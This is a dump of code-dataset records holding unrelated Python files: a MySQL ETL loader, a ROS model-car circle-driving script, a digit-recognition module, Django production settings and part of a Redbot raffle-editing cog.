into story_lead_media\nqrys = []\n\nfor item in json_obj:\n story_id = item['_key']\n if item['lead_media']: #check if lead_media not nul\n lead_media_type = item['lead_media']['type'] #assign lead_media_type\n if item['lead_media'] != None: #check lead_media, if null data will be ignored\n if 'urls' in item['lead_media']:#check if there urls key in lead_media\n for x in item['lead_media']['urls']: #assign lead_media_url\n lead_media_url = x \n qry=(story_id,lead_media_type,lead_media_url)\n qrys.append(qry)\n else: #if there is no ulrs key in lead_media\n lead_media_url = item['lead_media']['external_url']\n qry=(story_id,lead_media_type,lead_media_url)\n qrys.append(qry)\n\n\ncurr = mydb.cursor()\ncurr.execute(\"TRUNCATE story_lead_media\")\ncurr.close()\n\ncursor = mydb.cursor()\nstmt = \"INSERT INTO story_lead_media (story_id, lead_media_type, lead_media_url) VALUES (%s, %s, %s)\"\ncursor.executemany(stmt, qrys)\nmydb.commit()\ncursor.close()\n\n#insert value into story_polling\nqrys = []\n\nfor item in json_obj:\n story_id = item['_key']\n if item['polling']:\n date_start = item['polling']['date']['start']\n date_end = item['polling']['date']['end']\n question_text = item['polling']['question']['text']\n question_cover = item['polling']['question']['cover']\n hide_result = item['polling']['settings']['hideResult']\n is_multiple = item['polling']['settings']['isMultiple']\n other_manual = item['polling']['settings']['otherManual']\n qry = (story_id, date_start, date_end, question_text, question_cover,hide_result, is_multiple,other_manual)\n qrys.append(qry)\ncurr = mydb.cursor()\ncurr.execute(\"TRUNCATE story_polling\")\ncurr.close()\n\ncursor = mydb.cursor()\nstmt = \"INSERT INTO story_polling (story_id, date_start, date_end,question_text,question_cover,hide_results,is_multiple,other_manual) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\ncursor.executemany(stmt, qrys)\nmydb.commit()\ncursor.close()\n\n#insert value into polling_choices\nqrys = []\n\nfor item in json_obj:\n story_id = item['_key']\n if item['polling']:\n for x in range(len(item['polling']['choices'])):\n x = x+1\n choices_index = x\n x = str(x)\n if item['polling']['choices'][x]['image']:\n image = item['polling']['choices'][x]['image']\n else:\n image = None\n if 'selected' in item['polling']['choices'][x]:\n if item['polling']['choices'][x]['selected']:\n selected = 1\n else:\n selected = 0\n else:\n selected = None \n if item['polling']['choices'][x]['stats']:\n stats = item['polling']['choices'][x]['stats']\n else:\n stats = None \n if item['polling']['choices'][x]['text']:\n text = item['polling']['choices'][x]['text']\n else:\n text = None\n qry = (story_id,choices_index,image,selected,stats,text)\n qrys.append(qry)\n\ncurr = mydb.cursor()\ncurr.execute(\"TRUNCATE polling_choices\")\ncurr.close()\n\ncursor = mydb.cursor()\nstmt = \"INSERT INTO polling_choices (story_id, choices_index, image,selected,stats,text) VALUES (%s, %s, %s, %s, %s, %s)\"\ncursor.executemany(stmt, qrys)\nmydb.commit()\ncursor.close()","sub_path":"python_etl.py","file_name":"python_etl.py","file_ext":"py","file_size_in_byte":8714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"171947834","text":"#!/usr/bin/env python\n\nimport rospy\nfrom math import sqrt, tan\nimport numpy as np\nfrom nav_msgs.msg import Odometry\n# https://github.com/AutoMiny/AutoMiny/tree/master/catkin_ws/src/autominy_msgs/msg\nfrom autominy_msgs.msg import SteeringPWMCommand, SpeedCommand, SteeringPWMCommand\n\n# --- 
helper function that just returns an list of lists of length n ---\ndef give_n_list(n):\n list = []\n for i in range(n):\n list.append([])\n return list\n\nclass CircleDriver:\n def __init__ (self):\n # [[x0,x1,x2,...],[y0,y1,y2,...],[z0,z1,z2,...]]\n self.coordinate_history = give_n_list(3)\n # used to keep track for calculating distance driven\n self.last_coordinate_seen = None\n rospy.init_node(\"assignment_5\", anonymous=True)\n # Subscriber gets gps from ceilings camera\n # topic for Subscriber /communication/gps/\n # TODO: enter correct ID\n self.gps_subscriber = rospy.Subscriber(\"/communication/gps/5\", Odometry, self.get_points, queue_size=10)\n # Subscriber to voltage information of motor\n self.steering_angle = rospy. Subscriber(\"/sensors/arduino/steering_angle\", SteeringPWMCommand, self.print_voltage, queue_size=10)\n # Pubisher publishes steering angle\n self.steer_publisher = rospy.Publisher(\"/actuators/steering_pwm\", SteeringPWMCommand,queue_size=10)\n self.steer_cmd = SteeringPWMCommand()\n # Publisher publishes speed\n self.speed_publisher = rospy.Publisher(\"/actuators/speed\", SpeedCommand, queue_size=10)\n self.speed_cmd = SpeedCommand()\n\n # The spin() keeps things going\n #rospy.spin()\n self.rate = rospy.Rate(10) # 10ghz\n\n # saves points received by the camera to tracking file\n def get_points(self, odo):\n self.coordinate_history[0].append(odo.pose.pose.position.x)\n self.coordinate_history[1].append(odo.pose.pose.position.y)\n self.coordinate_history[2].append(odo.pose.pose.position.z)\n #self.print_latest_coordinates()\n\n # prints voltage information of motor\n def print_voltage(self, pwm):\n #print(\"voltage: \" + str(pwm.value))\n pass\n\n # prints the most current coordinates received by ceiling camera\n def print_latest_coordinates(self):\n print( \"x:\" + str(self.coordinate_history[0][-1]))\n print( \"y:\" + str(self.coordinate_history[1][-1]))\n\n # gets the latest gps-coordinates from the history\n def get_latest_coordinates(self):\n return (self.coordinate_history[0][-1], self.coordinate_history[1][-1], self.coordinate_history[2][-1])\n\n # drives car in circle and meassures three points for each 1s\n def drive_circle(self, steering, speeding):\n point_list = []\n #starting position\n point_list.append(self.get_latest_coordinates())\n self.start_drive_in_circle(steering, speeding)\n self.short_stop_car()\n rospy.sleep(5)\n # 2nd point\n point_list.append(self.get_latest_coordinates())\n self.short_stop_car()\n # 3rd point\n point_list.append(self.get_latest_coordinates())\n return point_list\n\n def start_drive_in_circle(self, steering, speeding):\n self.steer_cmd.value = steering\n self.speed_cmd.value = speeding\n self.steer_publisher.publish(self.steer_cmd)\n self.speed_publisher.publish(self.speed_cmd)\n\n\n def short_stop_car(self):\n cur = self.speed_cmd.value\n self.speed_cmd.value = 0\n self.speed_publisher.publish(self.speed_cmd)\n rospy.sleep(5)\n self.speed_cmd.value = 0.5\n self.speed_publisher.publish(self.speed_cmd)\n\n def stop_driving_circle(self):\n self.speed_cmd.value = 0\n self.steer_cmd.value = 0\n self.steer_publisher.publish(self.steer_cmd)\n self.speed_publisher.publish(self.speed_cmd)\n\n def reset_coord_history(self):\n self.coordinate_history = give_n_list(3)\n\n def update_distance_traveled(self):\n while len(self.coordinate_history) > 0:\n old_coordinate = self.last_coordinate_seen\n new_coordinate = self.coordinate_history[0]\n del(self.coordinate_history[0])\n # distance = sqrt((x1-x0)^2 + (y1-y0)^2)\n distance = 
sqrt((new_coordinate[0] - old_coordinate[0])**2 + (new_coordinate[1] - old_coordinate[1])**2)\n self.last_coordinate_seen = new_coordinate\n\n\n def drive_distance_in_circle(self, distance):\n self.reset_coord_history()\n distance_traveled = 0\n while(distance_traveled < distance):\n self.update_distance_traveled()\n self.stop_driving_circle()\n\n # Ackerman steering\n # ai = tan(wheelbase/(radius - track/2))^-1\n # a0 = tan(wheelbase/(radius + track/2))^-1\n # angle = (ai -a0)/2 + a0\n # http://datagenetics.com/blog/december12016/index.html\n def calculate_steering_anlge(wheelbase, track, radius):\n ai = tan(wheelbase/(radius - track/2))**-1\n a0 = tan(wheelbase/(radius + track/2))**-1\n return (ai - a0)/2 +a0\n\n def calculate_turning_radius(point0, point1, point2):\n x0 = point0[0]\n y0 = point0[1]\n x1 = point1[0]\n y1 = point1[1]\n x2 = point2[0]\n y2 = point2[1]\n\n a = np.array([[2*(x1-x0), 2*(y1-y0)], [2*(x2-x0), 2*(y2-y0)]])\n b = np.array([(x1**2 - x0**2) - (y1**2 - y0**2), (x2**2 - x0**2) -(y2**2-y0**2)])\n result = np.linalg.solve(a,b)\n x = result[0]\n y = result[1]\n\n r = sqrt(x**2 - 2*x*x0 + x0**2 + y**2 - 2*y*y0 +y0**2)\n return r\n\n\n steering_angles = (-1,0,1)\n\nif __name__ == '__main__':\n\n # --- find out the radius here by driving and taking three random point measssurements to calculate circle radius --- #\n cdriver = CircleDriver()\n print(\"taking meassurement points\")\n rospy.sleep(2)\n meassured_points = cdriver.drive_circle(1,0.3)\n rospy.sleep(5)\n print(\"3 points meassuered: \" + str(meassured_points))\n cdriver.stop_driving_circle()\n r = calculate_turning_radius(meassured_points[0], meassured_points[1], meassured_points[2])\n print(\"radius: \" + str(r))\n print(\"first:\" + str(cdriver.coordinate_history[0][0]))\n print(\"middle:\" + str(cdriver.coordinate_history[0][len(cdriver.coordinate_history[0])/2]))\n print(\"last:\" + str(cdriver.coordinate_history[0][-1]))\n\n # drive half a circle by using radius\n distance_half_circle = (numpy.pi * 2 * r)/2\n cdriver.drive_distance_in_circle(distance_half_circle)\n\n if drive_half_circle:\n rospy.sleep(5)\n","sub_path":"src/assignment5/src/abgabe5_4.py","file_name":"abgabe5_4.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"494133609","text":"n = int(input())\n\ns = input().split()\nnum = []\nfor i in range(n):\n s[i] = int(s[i])\n if s[i] not in num:\n num.append(s[i])\ncount = 0\nfor i in num:\n for j in num:\n if i - j == 1:\n count += 1\nprint(count)\n","sub_path":"Python/第1题/相邻数对.py","file_name":"相邻数对.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"615554109","text":"import sys\r\nfrom PIL import Image\r\nimport os\r\nfrom engineer.Algebra.linear import matrix\r\nimport matplotlib.pyplot as plt\r\n\r\nclass mnum:\r\n def __init__(self, minx, maxx, miny, maxy, A):\r\n self.minx = minx\r\n self.maxx = maxx\r\n self.maxy = maxy\r\n self.miny = miny\r\n self.w = A.m\r\n self.h = A.n\r\n self.A = A\r\n\r\ndef surr0(A):\r\n temp = matrix(A.n+2, A.m+2)\r\n for i in range(A.n):\r\n for j in range(A.m):\r\n temp[i+1][j+1] = A[i][j]\r\n return temp\r\n\r\ndef unsurr(A):\r\n temp = matrix(A.n-2,A.m-2)\r\n for i in range(1,A.n-1):\r\n for j in range(1,A.m-1):\r\n temp[i-1][j-1] = A[i][j]\r\n return temp\r\n\r\ndef through(A, check, x, y, maxx, minx, maxy, miny):\r\n sum = 4\r\n if A[y][x] == 2:\r\n miny = -2\r\n while 
sum != 0:\r\n sum = 0\r\n if A[y-1][x] != 0 and check[y-1][x] == 0:\r\n if y-1 < miny:\r\n miny = y-1\r\n sum += 1\r\n check[y - 1][x] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x, y - 1, maxx, minx, maxy, miny)\r\n if A[y+1][x] != 0 and check[y+1][x] == 0:\r\n if y+1 > maxy:\r\n maxy = y+1\r\n sum += 1\r\n check[y + 1][x] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x, y + 1, maxx, minx, maxy, miny)\r\n if A[y][x-1] != 0 and check[y][x-1] == 0:\r\n if x-1 < minx:\r\n minx = x-1\r\n sum += 1\r\n check[y][x-1] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x-1, y, maxx, minx, maxy, miny)\r\n if A[y][x+1] != 0 and check[y][x+1] == 0:\r\n if x+1 > maxx:\r\n maxx = x+1\r\n sum += 1\r\n check[y][x+1] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x+1, y, maxx, minx, maxy, miny)\r\n if A[y + 1][x + 1] != 0 and check[y + 1][x + 1] == 0:\r\n if x + 1 > maxx:\r\n maxx = x + 1\r\n if y + 1 > maxy:\r\n maxy = y + 1\r\n sum += 1\r\n check[y + 1][x + 1] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x + 1, y + 1, maxx, minx, maxy, miny)\r\n if A[y - 1][x - 1] != 0 and check[y - 1][x - 1] == 0:\r\n if x - 1 < minx:\r\n minx = x - 1\r\n if y - 1 < miny:\r\n miny = y - 1\r\n sum += 1\r\n check[y - 1][x - 1] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x - 1, y - 1, maxx, minx, maxy, miny)\r\n if A[y + 1][x - 1] != 0 and check[y + 1][x - 1] == 0:\r\n if x - 1 < minx:\r\n minx = x - 1\r\n if y + 1 > maxy:\r\n maxy = y + 1\r\n sum += 1\r\n check[y + 1][x - 1] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x - 1, y + 1, maxx, minx, maxy, miny)\r\n if A[y - 1][x + 1] != 0 and check[y - 1][x + 1] == 0:\r\n if x + 1 > maxx:\r\n maxx = x + 1\r\n if y - 1 < miny:\r\n miny = y - 1\r\n sum += 1\r\n check[y - 1][x + 1] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x + 1, y - 1, maxx, minx, maxy, miny)\r\n\r\n return check, maxx, minx, maxy, miny\r\n\r\ndef dim(A,x,y, check):\r\n check, maxx, minx, maxy, miny = through(A, check, x, y,x,x,y,y)\r\n return minx, maxx, miny, maxy, check\r\n\r\ndef intersectiony(A):\r\n ints = []\r\n for i in range(A.m):\r\n curr = A[0][i]\r\n if A.n == 1:\r\n ints.append(1)\r\n else:\r\n count = 0\r\n if curr == 1: count += 1\r\n for j in range(A.n):\r\n temp = A[j][i]\r\n if temp > curr:\r\n count += 1\r\n curr = A[j][i]\r\n\r\n ints.append(count)\r\n return ints\r\n\r\ndef intersectionx(A):\r\n return intersectiony(A.t())\r\n\r\ndef isMinus(A):\r\n intx = intersectionx(A)\r\n inty = intersectiony(A)\r\n for i in intx:\r\n if i > 1:\r\n return False\r\n for i in inty:\r\n if i > 1:\r\n return False\r\n return True\r\n\r\ndef isZero(A):\r\n intx = intersectionx(A)\r\n inty = intersectiony(A)\r\n # FIRST TEST CHECK NUMBER OF INTERSECTIONS OF HORIZONTAL AND VERTICAL LINES\r\n intcheckx = []\r\n intchecky = []\r\n test = [1,2,1]\r\n for i in intx:\r\n if not intcheckx:\r\n intcheckx.append(i)\r\n elif i != intcheckx[-1]:\r\n intcheckx.append(i)\r\n for i in inty:\r\n if not intchecky:\r\n intchecky.append(i)\r\n elif i != intchecky[-1]:\r\n intchecky.append(i)\r\n if intcheckx != test or intchecky != test:\r\n return False\r\n\r\n # SECOND TEST, SEE WEATHER IT CAN COMPLETE A ROTATION\r\n curr = A[0][0]\r\n x = 0\r\n y = 0\r\n while x < A.m:\r\n y = 0\r\n while y < A.n:\r\n if curr == 1:\r\n break\r\n y = y + 1\r\n curr = A[y][x]\r\n if curr == 1:\r\n break\r\n x = x + 1\r\n run = True\r\n check = matrix(A.n, A.m)\r\n xc = x\r\n temp = A.copy()\r\n try:\r\n while A[y][xc] != 0:\r\n temp[y][xc] = 
2\r\n xc += 1\r\n except IndexError:\r\n return False\r\n\r\n # break the next layer and iterate through, if anything touches the 2's we have a circle\r\n # 6, 8, 9 would supposedly pass as well but they don't pass the first test\r\n xs = 0\r\n ys = 0\r\n for i in range(x, xc):\r\n if A[y-1][i] == 1:\r\n xc2 = i\r\n while A[y-1][xc2] != 0:\r\n temp[y-1][xc2] = 0\r\n if temp[y-2][xc2] != 0:\r\n xs = xc2\r\n ys = y-2\r\n xc2 += 1\r\n break\r\n\r\n temp = surr0(temp)\r\n check = surr0(check)\r\n check,_,_,_,two = through(temp, check, xs, ys, 0, 0, 0, 0)\r\n if two == -2:\r\n return True\r\n return False\r\n\r\ndef isOne(A):\r\n t = A.copy()\r\n h = t.n\r\n no = int(0.2*h)\r\n t = matrix(t.A[no:])\r\n t = matrix(t.A[:t.n-no])\r\n ll, _ = leftLaser(t)\r\n if ll[0] == 0:\r\n return False\r\n for i in ll:\r\n if i != ll[0]:\r\n return False\r\n ll, _ = rightLaser(t)\r\n for i in ll:\r\n if i != ll[0]:\r\n return False\r\n return True\r\n\r\ndef isEight(A):\r\n intx = intersectionx(A)\r\n count = 0\r\n for i in range(len(intx)-1):\r\n if intx[i+1] == 2:\r\n intx[i] = 0\r\n elif intx[i] == 1:\r\n intx[i] = 0\r\n intx[-1] = 0\r\n if sum(intx,0) != 4:\r\n return False\r\n xy = []\r\n for i in range(len(intx)):\r\n if intx[i] == 2:\r\n start = False\r\n for j in range(len(A[i])):\r\n if A[i][j] == 1:\r\n start = True\r\n if start and A[i][j] == 0:\r\n xy.append([j,i])\r\n break\r\n\r\n check = matrix(A.n, A.m)\r\n temp = matrix(A.n, A.m)\r\n for i in range(A.n):\r\n for j in range(A.m):\r\n if A[i][j] == 1: temp[i][j] = 0\r\n else: temp[i][j] = 1\r\n check, _, _, _, _ = through(surr0(temp), surr0(check), 1, 1, 0, 0, 0, 0)\r\n check, _, _, _, _ = through(surr0(temp), check, 1, A.n, 0, 0, 0, 0)\r\n check, _, _, _, _ = through(surr0(temp), check, A.m, 1, 0, 0, 0, 0)\r\n check, _, _, _, _ = through(surr0(temp), check, A.m, A.n, 0, 0, 0, 0)\r\n\r\n if check[xy[0][1]+1][xy[0][0]+1] != 0:\r\n return False\r\n if check[xy[1][1]+1][xy[1][0]+1] != 0:\r\n return False\r\n\r\n return True\r\n\r\ndef fill(A, check, x, y):\r\n sum = 4\r\n while sum != 0:\r\n sum = 0\r\n if A[y - 1][x] != 0 and check[y - 1][x] == 0:\r\n sum += 1\r\n check[y - 1][x] = 1\r\n check = fill(A, check, x, y - 1)\r\n if A[y + 1][x] != 0 and check[y + 1][x] == 0:\r\n sum += 1\r\n check[y + 1][x] = 1\r\n check = fill(A, check, x, y + 1)\r\n if A[y][x - 1] != 0 and check[y][x - 1] == 0:\r\n sum += 1\r\n check[y][x - 1] = 1\r\n check = fill(A, check, x - 1, y)\r\n if A[y][x + 1] != 0 and check[y][x + 1] == 0:\r\n sum += 1\r\n check[y][x + 1] = 1\r\n check = fill(A, check, x + 1, y)\r\n\r\n if A[y + 1][x + 1] != 0 and check[y + 1][x + 1] == 0:\r\n sum += 1\r\n check[y + 1][x + 1] = 1\r\n check = fill(A, check, x + 1, y + 1)\r\n if A[y - 1][x - 1] != 0 and check[y - 1][x - 1] == 0:\r\n sum += 1\r\n check[y - 1][x - 1] = 1\r\n check = fill(A, check, x - 1, y - 1)\r\n if A[y + 1][x - 1] != 0 and check[y + 1][x - 1] == 0:\r\n sum += 1\r\n check[y + 1][x - 1] = 1\r\n check = fill(A, check, x - 1, y + 1)\r\n if A[y - 1][x + 1] != 0 and check[y - 1][x + 1] == 0:\r\n sum += 1\r\n check[y - 1][x + 1] = 1\r\n check = fill(A, check, x + 1, y - 1)\r\n\r\n return check\r\n\r\ndef fillout(A, x=1, y=1):\r\n temp = surr0(A)\r\n for i in range(temp.n):\r\n for j in range(temp.m):\r\n if temp[i][j] == 1:\r\n temp[i][j] = 0\r\n else:\r\n temp[i][j] = 1\r\n temp = surr0(temp)\r\n\r\n check = matrix(temp.n,temp.m)\r\n\r\n check = fill(temp, check, x, y)\r\n return unsurr(unsurr(check))\r\n\r\ndef isolate(mat):\r\n check = matrix(mat.n, mat.m)\r\n k = 0\r\n for i in 
range(mat.n):\r\n for j in range(mat.m):\r\n if mat[i][j] != 0 and check[i][j] == 0:\r\n minx, maxx, miny, maxy, check = dim(mat,j,i, check)\r\n if minx-maxx != 0 :\r\n k += 1\r\n temp = matrix(mat[miny:maxy+1]).t()\r\n temp = matrix(temp[minx:maxx+1]).t()\r\n yield minx, maxx, miny, maxy, temp\r\n\r\ndef matrify(img):\r\n w, h = img.size\r\n px = img.load()\r\n mat = matrix(h, w)\r\n for i in range(h):\r\n for j in range(w):\r\n if (255, 255, 255, 255) != px[j, i] \\\r\n and (242, 242, 242, 255) != px[j, i] \\\r\n and (238, 238, 238, 255) != px[j, i]:\r\n mat[i][j] = 1\r\n return mat\r\n\r\ndef scalex(A, n):\r\n S = []\r\n for i in A.A:\r\n if 0 not in i or 1 not in i:\r\n S.append(i*n)\r\n else:\r\n s = []\r\n for j in i:\r\n s += [j]*n\r\n S.append(s)\r\n return matrix(S)\r\n\r\ndef scaley(A,n):\r\n return scalex(A.t(), n).t()\r\n\r\ndef leftLaser(A):\r\n x = [-1 for i in range(A.n)]\r\n for i in range(A.n):\r\n for j in range(A.m):\r\n if A[i][j] == 1:\r\n x[i] = j\r\n break\r\n u = [-7]\r\n y = [i for i in reversed(range(len(x)))]\r\n aveth = 0\r\n for i in A.A:\r\n aveth += sum(i,0)/A.n/3\r\n\r\n\r\n xx = []\r\n for i in x:\r\n if i <= aveth:\r\n xx.append(0)\r\n if u[-1] != 'L':\r\n u.append('L')\r\n elif i >= 2*aveth:\r\n xx.append(2)\r\n if u[-1] != 'H':\r\n u.append('H')\r\n else:\r\n xx.append(1)\r\n if u[-1] != 'M':\r\n u.append('M')\r\n u= u[1:]\r\n return x, u\r\n\r\ndef rightLaser(A):\r\n temp = A.copy()\r\n for i in range(A.n):\r\n temp.A[i] = [j for j in reversed(temp.A[i])]\r\n return leftLaser(temp)\r\n\r\ndef number(A, heh):\r\n rl, ru = rightLaser(A)\r\n ll, lu = rightLaser(A)\r\n if isMinus(A):\r\n print('-')\r\n if isOne(A):\r\n print(1)\r\n if isZero(A):\r\n print(0)\r\n if lu == ['H','M','L','M','H'] and not isZero(A):\r\n print(6)\r\n if ru == ['H','L','M','H'] or ru == ['L','M','H']:\r\n print(7)\r\n\r\n if ru == ['H','M','L','M','H'] and not isZero(A):\r\n print(9)\r\n if isEight(A):\r\n print(8)\r\n\r\ndef matsum(A):\r\n temp = 0\r\n for i in range(A.n):\r\n for j in range(A.m):\r\n temp += A[i][j]\r\n return temp\r\n\r\ndef lineV(A):\r\n \"\"\"\r\n boolean function\r\n :param A: A matrix of a number\r\n :return: returns True if there is a line that goes from highest to lowest point\r\n \"\"\"\r\n for i in range(A.m):\r\n if A[-1][i] == 1:\r\n j = A.n-1\r\n while j > 0:\r\n if A[j][i] == 0:\r\n break\r\n else:\r\n j -= 1\r\n if j == 0:\r\n return True\r\n return False\r\n\r\n\r\n\r\n\r\nif __name__ ==\"__main__\":\r\n currdir = os.path.realpath(__file__)\r\n\r\n img2 = Image.open('matrixEx.PNG')\r\n mat2 = matrify(img2)\r\n nums2 = []\r\n for minx, maxx, miny, maxy, A in isolate(mat2):\r\n nums2.append(mnum(minx, maxx, miny, maxy, A))\r\n\r\n img = Image.open('matrixEx2.PNG')\r\n mat = matrify(img)\r\n nums = []\r\n for minx, maxx, miny, maxy, A in isolate(mat):\r\n nums.append(mnum(minx, maxx, miny, maxy, A))\r\n sys.setrecursionlimit(2000)\r\n for i in range(len(nums)):\r\n temp = fillout(nums[i].A) + nums[i].A\r\n if matsum(temp) == nums[i].A.n*nums[i].A.m:\r\n nums[i].pos = [1,2,3,5,7,'-']\r\n if lineV(nums[i].A):\r\n nums[i].pos = [1]\r\n else:\r\n nums[i].pos = [2,3,5,7,'-']\r\n if isMinus(nums[i].A):\r\n nums[i].pos = ['-']\r\n else:\r\n nums[i].pos = [2,3,5,7]\r\n else:\r\n nums[i].pos = [0,4,6,8,9]\r\n if lineV(nums[i].A):\r\n nums[i].pos = [4]\r\n else:\r\n nums[i].pos = [0,6,8,9]\r\n if max(intersectiony(nums[i].A)) == 2:\r\n nums[i].pos = [0]\r\n else:\r\n nums[i].pos = [6,8,9]\r\n # now check where 0 start from top and bottom if ave in higher half, 
9, lower half, 6\r\n xy = temp.index(0)\r\n tempp = fill(temp, temp, xy[0], xy[1])\r\n print(tempp)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"engineer/ImageRecognition/imageRead.py","file_name":"imageRead.py","file_ext":"py","file_size_in_byte":13895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"641328562","text":"import os\n\nfrom .base import * # noqa: F401,F403\n\n\nCSRF_COOKIE_SECURE = True\nDEBUG = os.environ.get('DEBUG', False)\nSECURE_BROWSER_XSS_FILTER = True\nSECURE_CONTENT_TYPE_NOSNIFF = True\nSECURE_HSTS_INCLUDE_SUBDOMAINS = True\nSECURE_HSTS_PRELOAD = True\nSECURE_HSTS_SECONDS = 3600\nSECURE_SSL_REDIRECT = True\nSESSION_COOKIE_SECURE = True\nX_FRAME_OPTIONS = 'DENY'\n\nALLOWED_HOSTS = os.environ['ALLOWED_HOSTS'].split(' ')\nSECRET_KEY = os.environ['SECRET_KEY']\n\nRAVEN_CONFIG = {\n 'dsn': os.environ['RAVEN_DSN'],\n 'environment': os.environ.get('ENV', 'production'),\n}\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'root': {\n 'level': 'WARNING',\n 'handlers': ['sentry'],\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module) %(process)d %(thread)d %(message)s',\n },\n },\n 'handlers': {\n 'sentry': {\n 'level': 'WARNING',\n 'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',\n 'tags': {'custom-tag': 'x'},\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose',\n }\n },\n 'loggers': {\n 'django.db.backends': {\n 'level': 'WARNING',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'raven': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'sentry.errors': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n },\n}\n","sub_path":"config/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"244365623","text":"import asyncio\nimport contextlib\nfrom typing import Union\n\nimport discord\nfrom redbot.core import commands\nfrom redbot.core.i18n import Translator\nfrom redbot.core.utils.chat_formatting import box\nfrom redbot.core.utils.menus import start_adding_reactions\nfrom redbot.core.utils.predicates import MessagePredicate, ReactionPredicate\n\nfrom ...mixins.abc import RaffleMixin\nfrom ...mixins.metaclass import MetaClass\nfrom ...utils.converters import RaffleFactoryConverter\nfrom ...utils.enums import RaffleComponents\nfrom ...utils.exceptions import InvalidArgument, RaffleError\nfrom ...utils.formatting import cross, tick\nfrom ...utils.helpers import (\n cleanup_code,\n format_traceback,\n raffle_safe_member_scanner,\n start_interactive_message_session,\n validator,\n)\nfrom ...utils.parser import RaffleManager\n\n_ = Translator(\"Raffle\", __file__)\n\n\nclass EditorCommands(RaffleMixin, metaclass=MetaClass):\n \"\"\"Mixin for commands under ``[p]raffle edit``.\"\"\"\n\n @commands.group()\n async def raffle(self, ctx):\n pass\n\n @raffle.group()\n async def edit(self, ctx):\n \"\"\"Edit the settings for a raffle.\"\"\"\n pass\n\n @edit.command()\n async def accage(self, ctx, raffle: RaffleFactoryConverter, new_account_age: Union[int, bool]):\n \"\"\"Edit the account age requirement for a raffle.\n\n Use `0` or `false` to disable this condition.\n\n **Arguments:**\n - `` - The name of the raffle.\n - `` - The new account age requirement.\n \"\"\"\n async with self.config.guild(ctx.guild).raffles() as 
r:\n\n            raffle_data = r.get(raffle, None)\n\n            if isinstance(new_account_age, bool):\n                if not new_account_age:\n                    with contextlib.suppress(KeyError):\n                        del raffle_data[\"account_age\"]\n                    return await ctx.send(_(\"Account age requirement removed from this raffle.\"))\n                else:\n                    return await ctx.send(\n                        _('Please provide a number, or \"false\" to disable this condition.')\n                    )\n\n            try:\n                RaffleManager.parse_accage(new_account_age)\n            except InvalidArgument as e:\n                return await ctx.send(format_traceback(e))\n\n            raffle_data[\"account_age\"] = new_account_age\n            await ctx.send(_(\"Account age requirement updated for this raffle.\"))\n\n        await self.clean_guild_raffles(ctx)\n\n    @edit.command()\n    async def convertsimple(self, ctx, raffle: RaffleFactoryConverter):\n        \"\"\"Convert a raffle to a simple one (name and description).\n\n        **Arguments**\n            - `<raffle>` - The name of the raffle.\n        \"\"\"\n        components = [e.name for e in RaffleComponents][2:]\n\n        async with self.config.guild(ctx.guild).raffles() as r:\n\n            raffle_data = r.get(raffle, None)\n\n            message = _(\n                \":warning: Are you sure you want to convert this raffle to a simple raffle?\\n\"\n                \"It will remove all the conditions!\"\n            )\n\n            can_react = ctx.channel.permissions_for(ctx.me).add_reactions\n            if not can_react:\n                message += \" (y/n)\"\n            message = await ctx.send(message)\n\n            if can_react:\n                start_adding_reactions(message, ReactionPredicate.YES_OR_NO_EMOJIS)\n                predicate = ReactionPredicate.yes_or_no(message, ctx.author)\n                event_type = \"reaction_add\"\n            else:\n                predicate = MessagePredicate.yes_or_no(ctx)\n                event_type = \"message\"\n\n            try:\n                await self.bot.wait_for(event_type, check=predicate, timeout=30)\n            except asyncio.TimeoutError:\n                await ctx.send(_(\"You took too long to respond.\"))\n\n            if predicate.result:\n                delkeys = []\n                for k in raffle_data.keys():\n                    if k in components:\n                        delkeys.append(k)\n                for k in delkeys:\n                    del raffle_data[k]\n                await ctx.send(_(\"Raffle converted to simple raffle.\"))\n\n            else:\n                await ctx.send(_(\"No changes have been made.\"))\n\n        await self.clean_guild_raffles(ctx)\n\n    @edit.command()\n    async def serverjoinage(\n        self, ctx, raffle: RaffleFactoryConverter, new_server_join_age: Union[int, bool]\n    ):\n        \"\"\"Edit the server join age requirement for a raffle.\n\n        Use `0` or `false` to disable this condition.\n\n        **Arguments:**\n            - `<raffle>` - The name of the raffle.\n            - `<new_server_join_age>` - The new join age requirement.\n        \"\"\"\n        async with self.config.guild(ctx.guild).raffles() as r:\n\n            raffle_data = r.get(raffle, None)\n\n            if not new_server_join_age:\n                with contextlib.suppress(KeyError):\n                    del raffle_data[\"server_join_age\"]\n                return await ctx.send(_(\"Server join age requirement removed from this raffle.\"))\n\n            elif new_server_join_age is True:\n                return await ctx.send(\n                    _('Please provide a number, or \"false\" to disable this condition.')\n                )\n\n            else:\n                try:\n                    RaffleManager.parse_serverjoinage(ctx, new_server_join_age)\n                except InvalidArgument as e:\n                    return await ctx.send(format_traceback(e))\n\n                raffle_data[\"server_join_age\"] = new_server_join_age\n                await ctx.send(_(\"Server join age requirement updated for this 